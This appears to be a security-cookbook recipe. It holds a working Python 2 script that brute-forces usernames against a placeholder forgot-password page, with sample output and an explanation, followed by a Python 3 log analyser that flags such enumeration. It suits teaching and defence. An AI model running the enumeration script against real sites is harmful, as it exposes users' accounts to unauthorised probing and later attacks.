Brute forcing usernames

For small but regular instances, a small tool that enables you to quickly check something will suffice. What about those bigger jobs? Maybe you've got a big haul from open source intelligence gathering and you want to see which of those users use an application you are targeting. This recipe will show you how to automate the process of checking for usernames that you have stored in a file.

Getting ready

Before you use this recipe, you will need to acquire a list of usernames to test. This can either be something you have created yourself, or you can use a word list found within Kali. If you need to create your own list, a good place to start would be to use common names that are likely to be found in a web application. These could include usernames such as user, admin, administrator, and so on.

How to do it…

This script will attempt to check usernames in a list provided to determine whether or not an account exists within the application:

#brute force username enumeration
import sys
import urllib
import urllib2

if len(sys.argv) != 2:
    print "usage: %s filename" % (sys.argv[0])
    sys.exit(0)

filename = str(sys.argv[1])
userlist = open(filename, 'r')
url = "http://www.vulnerablesite.com/forgotpassword.html"
foundusers = []
# Text the application returns when the submitted username does not exist
UnknownStr = "Username not found"

for user in userlist:
    # Remove the trailing newline so it is not encoded into the request
    user = user.rstrip()
    data = urllib.urlencode({"username": user})
    request = urllib2.urlopen(url, data)
    response = request.read()

    # The account exists only when the "not found" message is absent
    if response.find(UnknownStr) < 0:
        foundusers.append(user)
    request.close()
userlist.close()

if len(foundusers) > 0:
    print "Found Users:\n"
    for name in foundusers:
        print name + "\n"
else:
    print "No users found\n"

The following is an example of the output of this script:

python bruteusernames.py userlist.txt
Found Users:
admin
angela
bob
john

How it works…

This script introduces a couple more concepts than basic username checking. The first of these is opening files in order to load our list:

userlist = open(filename,'r')

This opens the file containing our list of usernames and assigns the file object to our userlist variable. We then loop through the file, reading one username per line. In this recipe, we also make use of the following line of code:

user=user.rstrip()

This command strips trailing whitespace, including the newline character at the end of each line, which would otherwise be encoded and submitted as part of the username and could change the result.

If the response does not contain the "Username not found" message, the username exists and is appended to a list. When all usernames have been checked, the contents of the list are output.
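
From the defender's side, the pattern this script produces is one client submitting many different usernames to the password-reset page in a short time. The following added example (not part of the original recipe; written for Python 3) flags that pattern in an application log; the log format, sample lines, function name, and thresholds are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (assumed format, not from the original recipe):
# ISO timestamp, client IP, request path, submitted username
SAMPLE_LOG = """\
2024-01-01T10:00:00 203.0.113.7 /forgotpassword.html admin
2024-01-01T10:00:00 192.0.2.15 /forgotpassword.html carol
2024-01-01T10:00:02 203.0.113.7 /forgotpassword.html angela
2024-01-01T10:00:04 203.0.113.7 /forgotpassword.html bob
2024-01-01T10:00:05 198.51.100.20 /forgotpassword.html alice
2024-01-01T10:00:06 203.0.113.7 /forgotpassword.html john
2024-01-01T10:00:08 203.0.113.7 /forgotpassword.html user
2024-01-01T10:00:20 198.51.100.20 /forgotpassword.html alice
2024-01-01T10:03:00 192.0.2.15 /forgotpassword.html dave
2024-01-01T10:06:00 192.0.2.15 /forgotpassword.html erin
2024-01-01T10:09:00 192.0.2.15 /forgotpassword.html frank
"""


def find_enumeration(log_text, path="/forgotpassword.html",
                     max_distinct=3, window_seconds=60):
    """Map client IP -> peak count of distinct usernames, for clients that sent
    more than max_distinct different usernames to path within the window."""
    recent = defaultdict(deque)  # ip -> (timestamp, username) events in window
    flagged = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != path:
            continue  # malformed line or a different endpoint
        try:
            ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%S")
        except ValueError:
            continue  # unparseable timestamp
        ip, username = parts[1], parts[3].lower()
        events = recent[ip]
        events.append((ts, username))
        # Drop events older than the window (lines are assumed time-ordered)
        while (ts - events[0][0]).total_seconds() > window_seconds:
            events.popleft()
        distinct = len({name for _, name in events})
        if distinct > max_distinct:
            flagged[ip] = max(flagged.get(ip, 0), distinct)
    return flagged


if __name__ == "__main__":
    for ip, count in sorted(find_enumeration(SAMPLE_LOG).items()):
        print("%s submitted %d distinct usernames in window" % (ip, count))
```

Counting distinct usernames rather than raw requests keeps a single user who retries their own reset from being flagged; a slower run only shows up when the window is widened.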

See also

For single usernames, you will want to make use of the Basic username check recipe.
